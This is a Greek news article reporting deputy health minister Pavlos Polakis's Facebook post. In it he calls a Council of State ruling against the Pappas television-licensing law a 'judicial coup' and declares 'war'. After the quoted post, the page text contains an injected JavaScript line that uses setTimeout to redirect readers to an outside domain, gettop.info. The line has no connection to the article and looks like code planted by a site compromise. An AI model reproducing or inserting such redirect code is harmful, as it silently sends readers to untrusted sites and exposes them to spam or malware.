«Ξέφυγε» ο Πολάκης- Μιλά για «δικαστικό πραξικόπημα» και «ανοίγει» πόλεμο

0
8

 

O αναπληρωτης υπουργός Υγείας Παύλος Πολάκης επιχειρεί να αποκαταστήσει την… τιμή της κυβέρνησης μέτα την απόφαση καταπέλτη του ΣτΕ, που έκρινε αντισυνταγματικό το νόμο Παππά.
«Οι κυβερνήσεις δεν πέφτουν με δικαστικά πραξικοπήματα» έγραψε, ο αναπληρωτής υπουργός Υγείας, στον προσωπικό του λογαριασμό στο Facebook, σχολιάζοντας την απόφαση του Συμβουλίου της Επικρατείας.

Ενώ γράφει επίσης: «Έχουμε πόλεμο και η αριστερά ξέρει να πολεμάει».

Η ανάρτηση του Παύλου Πολάκη αναλυτικά έχει ως εξής:

«Οι κυβερνήσεις δεν πέφτουν με δικαστικά πραξικοπήματα .
Όπως και με το διώξιμο των εργολάβων που έβγαλε το ΣΤΕ παράνομο και ψηφίσαμε αλλο νόμο που το επεκτείναμε σε όλο το δημοςιο τομέα ,όπως με το Γιαννοπουλο που τον ξαναγύρισαν στο Κεελπνο και τον ξανά διώξαμε ,ΕΤΣΙ ΘΑ ΓΙΝΕΙ ΚΑΙ ΜΕ ΤΑ ΚΑΝΑΛΙΑ .
Εμεις ΔΕ ΘΑ ΚΑΝΟΥΜΕ ΠΙΣΩ

Υγ1 Δηλαδη μας λένε οι αξιότιμοι δικαστές ότι είναι συνταγματικό να εκπέμπουν τα βοθροκαναλα χωρίς άδεια και αντισυνταγματικό να πάρουμε 4000 στα νοσοκομεία και 15000 παραπάνω στους παιδικούς σταθμούς από τα χρήματα του διαγωνισμού ;!;!;!;!

Υγ2 όταν μίλησα για το πρόβλημα της Δικαιοσύνης πριν δυο τρεις μήνες στο περιστέρι, μου την έπεσαν με «ιερή αγανάκτηση» όλα τα συστημικά μέσα και οι εκπρόσωποι ΝΔ-ΠΑΣΟΚ -ποτάμι για «ασέβεια » .Κάτι ήξεραν για το ποιος θα προστατέψει το σύστημα εξουσίας και διαπλοκής!!!

Υγ3 ΕΧΟΥΜΕ ΠΟΛΕΜΟ ΚΑΙ Η ΑΡΙΣΤΕΡΑ ΞΕΡΕΙ ΝΑ ΠΟΛΕΜΑΕΙ !!!»

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here